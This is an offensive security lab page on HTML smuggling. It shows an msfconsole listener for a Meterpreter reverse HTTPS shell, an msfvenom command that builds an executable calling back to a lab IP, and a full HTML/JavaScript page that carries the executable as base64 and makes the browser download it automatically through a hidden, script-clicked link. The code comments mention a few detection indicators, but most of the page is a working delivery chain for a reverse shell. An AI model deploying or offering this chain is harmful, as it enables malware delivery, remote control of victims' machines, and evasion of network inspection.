# HTML Smuggling: Auto Download

{% code title="listener:" %}

```bash
# Lab listener. Only the first line is a shell command: -q suppresses the banner
# and -x runs the quoted console command at startup. The set/run lines that
# follow are entered at the msf console prompt, not in bash.
# Payload, LHOST and LPORT here are the same values passed to msfvenom on this page.
sudo msfconsole -q -x "use exploit/multi/handler"
set payload windows/x64/meterpreter/reverse_https
set lhost 192.168.119.120
set lport 443
run
```

{% endcode %}

{% code title="shell.exe to embed in html:" overflow="wrap" fullWidth="true" %}

```
# Builds the lab executable: -p selects the payload, -f exe the output format,
# -o the output path. Only its base64 text is later embedded in index.html.
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f exe -o /var/www/html/msfstaged.exe
```

{% endcode %}

<pre data-title="convert .exe to base64" data-overflow="wrap" data-full-width="true"><code><a data-footnote-ref href="#user-content-fn-1">base64 /var/www/html/msfstaged.exe</a>
</code></pre>

<pre class="language-html" data-title="/var/www/html/index.html" data-overflow="wrap" data-line-numbers data-full-width="true"><code class="lang-html">&#x3C;html>
    &#x3C;body>
        &#x3C;script>
          // Decodes a base64 string and returns the raw bytes as an ArrayBuffer.
          // atob() yields a "binary string" (one character per byte); the loop copies
          // each character code into a Uint8Array so the bytes can be wrapped in a Blob.
          function base64ToArrayBuffer(base64) {
    		  var binary_string = window.atob(base64);
    		  var len = binary_string.length;
    		  var bytes = new Uint8Array( len );
    		  for (var i = 0; i &#x3C; len; i++) { bytes[i] = binary_string.charCodeAt(i); }
    		  return bytes.buffer;
      		}
      		
      		// The whole executable is carried inside the page as base64 text.
      		// 'TVqQ' is base64 for the bytes 4D 5A 90, the start of the MZ/PE header, so a long
      		// inline string beginning this way is a useful content-inspection indicator.
      		var file =<a data-footnote-ref href="#user-content-fn-2">'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAA...'</a>
      		var data = base64ToArrayBuffer(file);
      		// The type label is chosen by the page script; no server Content-Type header is involved.
      		var blob = new Blob([data], {type: 'octet/stream'});
      		var fileName = '<a data-footnote-ref href="#user-content-fn-3">msfstaged.exe</a>';
      		
      		// Hidden anchor + download attribute + scripted click(): the save is started by the
      		// page itself, without the user clicking a link. Together with createObjectURL this
      		// combination is the pattern to look for when reviewing or detecting such pages.
      		var a = document.createElement('a');
      		document.body.appendChild(a);
      		a.style = 'display: none';
      		var url = <a data-footnote-ref href="#user-content-fn-4">window.URL.createObjectURL(blob)</a>;
      		a.href = url;
      		a.download = fileName;
      		a.click();
      		// Releases the object URL right after the click has been issued.
      		window.URL.revokeObjectURL(url);
        &#x3C;/script>
    &#x3C;/body>
&#x3C;/html>
</code></pre>

```bash
# Starts Apache so that /var/www/html/index.html is served to the lab client.
sudo service apache2 start
```

[^1]: `var file ='TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAA...'`

[^2]: `base64 /var/www/html/msfstaged.exe`

[^3]: or `.ps1`, `.hta`

[^4]: for IE/old Edge:

    `window.navigator.msSaveBlob(blob);`&#x20;

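    `createObjectURL` makes the download look like a file hosted on the server, but the bytes are read from memory inside the page, so the executable never crosses the network as its own download; inspection has to look at the HTML/JavaScript content or at the file written on the endpoint.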
